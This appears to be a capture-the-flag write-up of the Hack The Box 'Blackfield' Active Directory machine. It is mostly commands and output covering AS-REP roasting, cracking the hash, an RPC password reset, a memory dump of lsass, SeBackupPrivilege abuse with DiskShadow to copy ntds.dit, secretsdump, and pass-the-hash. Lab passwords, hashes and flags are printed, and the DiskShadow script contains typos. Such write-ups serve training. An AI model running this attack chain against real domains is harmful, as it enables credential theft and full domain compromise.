- Published on
Hack The Box - Blackfield
Blackfield is a good Windows Activity directory box, first we need exploit AS-REP-roasting we can reset another user’s password over RPC. With access to another share, We will found a bunch of process memory dumps, one of which is lsadump and we get user password. User have Special privilege called SeBackupPrivilege and SeRestorePrivilege using that and DiskShadow we can copy the Drive.
Link: https://www.hackthebox.eu/home/machines/profile/255
Let's Begin with our Initial Nmap Scan.
Nmap Scan Results
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-10 09:46:26Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/10%Time=5EE04886%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h04m15s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-10T09:49:09
|_ start_date: N/A
SMB Enumeration
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient -L 10.10.10.192
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
I'm unable to list in these shares but I logged in without any password.
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient //10.10.10.192/forensic
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient //10.10.10.192/SYSVOL
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient //10.10.10.192/NETLOGON
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
In profiles$ share I found lot of users directory and there is no files inside, If u see the 0 it shows there is not content inside them.
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient //10.10.10.192/profiles$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 22:17:12 2020
.. D 0 Wed Jun 3 22:17:12 2020
AAlleni D 0 Wed Jun 3 22:17:11 2020
ABarteski D 0 Wed Jun 3 22:17:11 2020
ABekesz D 0 Wed Jun 3 22:17:11 2020
ABenzies D 0 Wed Jun 3 22:17:11 2020
.
.
.
.
YHuftalin D 0 Wed Jun 3 22:17:12 2020
YKivlen D 0 Wed Jun 3 22:17:12 2020
YKozlicki D 0 Wed Jun 3 22:17:12 2020
YNyirenda D 0 Wed Jun 3 22:17:12 2020
YPredestin D 0 Wed Jun 3 22:17:12 2020
YSeturino D 0 Wed Jun 3 22:17:12 2020
YSkoropada D 0 Wed Jun 3 22:17:12 2020
YVonebers D 0 Wed Jun 3 22:17:12 2020
YZarpentine D 0 Wed Jun 3 22:17:12 2020
ZAlatti D 0 Wed Jun 3 22:17:12 2020
ZKrenselewski D 0 Wed Jun 3 22:17:12 2020
ZMalaab D 0 Wed Jun 3 22:17:12 2020
ZMiick D 0 Wed Jun 3 22:17:12 2020
ZScozzari D 0 Wed Jun 3 22:17:12 2020
ZTimofeeff D 0 Wed Jun 3 22:17:12 2020
ZWausik D 0 Wed Jun 3 22:17:12 2020
7846143 blocks of size 4096. 4098895 blocks available
Copied them to my machine and grab the username alone.
Totally 314 User names we found
root@kali:~/CTF/HTB/Boxes/Blackfield# cat smb_profile | awk '{print $1}' > smb_users
root@kali:~/CTF/HTB/Boxes/Blackfield# wc -l smb_users
314 smb_users
Kerberos Enumeration
Since the port 88 is open, we can move on to the kerberosting technique. But to do Kerberosting technique we need credentials on the domain to authenticate. But we have a chance if Do not require Kerberos preauthentication is True. There is a tool called GetNPUsers.py from Impackets.
This is the tool we looking for, let’s give a try.
Since we already got some list of users, I decided to use them.
root@kali:~/CTF/HTB/Boxes/Blackfield# GetNPUsers.py -usersfile smb_users -dc-ip 10.10.10.192 -request blackfield.local/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
.
.
.
.
.
$krb5asrep$23$support@BLACKFIELD.LOCAL:61a39b1896f521c0e2f97e2ea34899e6$8045a7e886363c063c13640534e10c5526b9bbe6f89b0a9abb77323b58a384bc244dc66a7b491f8977722875f986f34554d3d5459f998e64def8c5aaf0d415164c46980e9aec221de9abe3cf49cd816fa51b8077128b948c025f831fd80ade0c47734da39ca14dc6e15ef2da5b441e009c887d758a978a505f786caf1a6b833d81dc1fa8a6a3e29bb098149c279622e524b295c7f07946cde5a2abe243209846af5591e0fad7cc67bbb028580064d02ef70461cfb108605be0faf5f3316ede61a80e5e6118f432c2bc27d5f949e23a2d75fba492f80b17a92beabc830b2624204a8cdd7bdddd17343d1ae810eae5d199274a79f0
.
.
.
.
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
And we got a hash here.
I cracked the hash using John
root@kali:~/CTF/HTB/Boxes/Blackfield# john --wordlist=/usr/share/wordlists/rockyou.txt kerb.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:09 DONE (2020-06-10 09:30) 0.1028g/s 1474Kp/s 1474Kc/s 1474KC/s #1WIF3Y.."chito"
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/CTF/HTB/Boxes/Blackfield# john --show kerb.john
$krb5asrep$23$support@BLACKFIELD.LOCAL:#00^BlackKnight
1 password hash cracked, 0 left
We got the password for support : #00^BlackKnight
I tried login with evil-winrm but it failed so I decided to go back to SMB
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient //10.10.10.192/SYSVOL -U 'support'
Enter WORKGROUP\support's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 16:43:05 2020
.. D 0 Sun Feb 23 16:43:05 2020
BLACKFIELD.local D 0 Sun Feb 23 16:43:05 2020
re
7846143 blocks of size 4096. 4098569 blocks available
smb: \> recurse on
smb: \> ls
. D 0 Sun Feb 23 16:43:05 2020
.. D 0 Sun Feb 23 16:43:05 2020
BLACKFIELD.local D 0 Sun Feb 23 16:43:05 2020
\BLACKFIELD.local
. D 0 Sun Feb 23 16:49:28 2020
.. D 0 Sun Feb 23 16:49:28 2020
DfsrPrivate DHS 0 Sun Feb 23 16:49:28 2020
Policies D 0 Sun Feb 23 16:43:14 2020
scripts D 0 Sun Feb 23 16:43:05 2020
\BLACKFIELD.local\DfsrPrivate
NT_STATUS_ACCESS_DENIED listing \BLACKFIELD.local\DfsrPrivate\*
\BLACKFIELD.local\Policies
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sun Feb 23 16:43:14 2020
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\scripts
. D 0 Sun Feb 23 16:43:05 2020
.. D 0 Sun Feb 23 16:43:05 2020
\BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
GPT.INI A 22 Sun Feb 23 16:50:36 2020
MACHINE D 0 Sun Feb 23 16:50:36 2020
USER D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
GPT.INI A 22 Sun Feb 23 16:43:14 2020
MACHINE D 0 Sun Feb 23 16:43:14 2020
USER D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
. D 0 Sun Feb 23 16:50:36 2020
.. D 0 Sun Feb 23 16:50:36 2020
Microsoft D 0 Sun Feb 23 16:43:14 2020
Registry.pol A 2796 Sun Feb 23 16:50:36 2020
\BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
Microsoft D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
Windows NT D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
Windows NT D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
SecEdit D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
SecEdit D 0 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
GptTmpl.inf A 1098 Sun Feb 23 16:43:14 2020
\BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sun Feb 23 16:43:14 2020
.. D 0 Sun Feb 23 16:43:14 2020
GptTmpl.inf A 3764 Sun Feb 23 16:43:14 2020
smb: \>
Checked them all but nothing seems useful
RPC Enumeration
root@kali:~/CTF/HTB/Boxes/Blackfield/BloodHound# rpcclient -U 'support%#00^BlackKnight' 10.10.10.192
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
.
.
.
.
.
user:[BLACKFIELD307633] rid:[0x57e]
user:[BLACKFIELD758945] rid:[0x57f]
user:[BLACKFIELD541148] rid:[0x580]
user:[BLACKFIELD532412] rid:[0x581]
user:[BLACKFIELD996878] rid:[0x582]
user:[BLACKFIELD653097] rid:[0x583]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
rpcclient $>
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'
rpcclient $>
This time I tried login in forensic share and Im logged in.
root@kali:~/CTF/HTB/Boxes/Blackfield# smbclient //10.10.10.192/forensic -U 'audit2020'
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 18:33:16 2020
.. D 0 Sun Feb 23 18:33:16 2020
commands_output D 0 Sun Feb 23 23:44:37 2020
memory_analysis D 0 Fri May 29 01:58:33 2020
tools D 0 Sun Feb 23 19:09:08 2020
7846143 blocks of size 4096. 4095546 blocks available
smb: \>
These are tools used for Digital forensics.
smb: \> cd tools
smb: \tools\> ls
. D 0 Sun Feb 23 19:09:08 2020
.. D 0 Sun Feb 23 19:09:08 2020
sleuthkit-4.8.0-win32 D 0 Sun Feb 23 19:09:03 2020
sysinternals D 0 Sun Feb 23 19:05:25 2020
volatility D 0 Sun Feb 23 19:05:39 2020
7846143 blocks of size 4096. 4095034 blocks available
smb: \tools\>
So these must be the files which are got from the tools.
smb: \> cd memory_analysis
ls
smb: \memory_analysis\> ls
. D 0 Fri May 29 01:58:33 2020
.. D 0 Fri May 29 01:58:33 2020
conhost.zip A 37876530 Fri May 29 01:55:36 2020
ctfmon.zip A 24962333 Fri May 29 01:55:45 2020
dfsrs.zip A 23993305 Fri May 29 01:55:54 2020
dllhost.zip A 18366396 Fri May 29 01:56:04 2020
ismserv.zip A 8810157 Fri May 29 01:56:13 2020
lsass.zip A 41936098 Fri May 29 01:55:08 2020
mmc.zip A 64288607 Fri May 29 01:55:25 2020
RuntimeBroker.zip A 13332174 Fri May 29 01:56:24 2020
ServerManager.zip A 131983313 Fri May 29 01:56:49 2020
sihost.zip A 33141744 Fri May 29 01:57:00 2020
smartscreen.zip A 33756344 Fri May 29 01:57:11 2020
svchost.zip A 14408833 Fri May 29 01:57:19 2020
taskhostw.zip A 34631412 Fri May 29 01:57:30 2020
winlogon.zip A 14255089 Fri May 29 01:57:38 2020
wlms.zip A 4067425 Fri May 29 01:57:44 2020
WmiPrvSE.zip A 18303252 Fri May 29 01:57:53 2020
There is [lsass.zip](http://lsass.zip).
What is LSASS? Local Security Authority Subsystem Service is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system
Getting User Shell
Downloaded to my machine.
root@kali:~/CTF/HTB/Boxes/Blackfield/memory_analysis# smbget -R smb://10.10.10.192/forensic/memory_analysis/lsass.zip -U audit2020
Password for [audit2020] connecting to //forensic/10.10.10.192:
Using workgroup WORKGROUP, user audit2020
smb://10.10.10.192/forensic/memory_analysis/lsass.zip
Downloaded 39.99MB in 557 seconds
root@kali:~/CTF/HTB/Boxes/Blackfield/forensic/memory_analysis# unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
root@kali:~/CTF/HTB/Boxes/Blackfield/forensic/memory_analysis# ls
lsass.DMP lsass.zip
It contains lsass.dmp file, it is dump file.
We can extract password from it
root@kali:~/CTF/HTB/Boxes/Blackfield# evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> dir
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/9/2020 5:39 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
b5------------------------------0a6
Privilege Escalation
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
SeBackupPrivilege - Required to perform backup operations. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. This privilege is required by the RegSaveKey and RegSaveKeyExfunctions. The following access rights are granted if this privilege is held: READ_CONTROL ACCESS_SYSTEM_SECURITY FILE_GENERIC_READ FILE_TRAVERSE User Right: Back up files and directories.
So I Googled about what we can do with this Privilege and Found these.
What is NTDS.dit? This file is AD database it contains all account information and passwords from AD domain, so if we compromise this file we can do anything.
script.txt
set metadata C:\Windows\System32\spool\drivers\color\sss.cabs
set context clientaccessibles
set context persistents
begin backups
add volume c: alias mydrives
creates
expose %mydrive% z:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/10/2020 1:41:53 PM
-> set metadata C:\Windows\System32\spool\drivers\color\sss.cab
The existing file will be overwritten.
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {0e25477e-fbdf-4d5b-9b89-856d1d63a57f} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {5f450b2c-b605-400b-a983-cad1c6ff5c21} set as environment variable.
Querying all shadow copies with the shadow copy set ID {5f450b2c-b605-400b-a983-cad1c6ff5c21}
* Shadow copy ID = {0e25477e-fbdf-4d5b-9b89-856d1d63a57f} %mydrive%
- Shadow copy set: {5f450b2c-b605-400b-a983-cad1c6ff5c21} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/10/2020 1:42:57 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %mydrive% z:
-> %mydrive% = {0e25477e-fbdf-4d5b-9b89-856d1d63a57f}
The shadow copy was successfully exposed as z:\.
Note: END BACKUP was not commanded, writers not notified BackupComplete.
DiskShadow is exiting.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Users\svc_backup\Documents\ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system c:\Users\svc_backup\Documents\system.bak
The operation completed successfully.
Finally we got all the files we need, Now download them to your machine.
root@kali:~/CTF/HTB/Boxes/Blackfield# secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
root@kali:~/CTF/HTB/Boxes/Blackfield# evil-winrm -i 10.10.10.192 -u Administrator -H '184fb5e5178480be64824d4cd53b99ee'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
43b7ac28c8ba0ab98dc6b48e94999f3a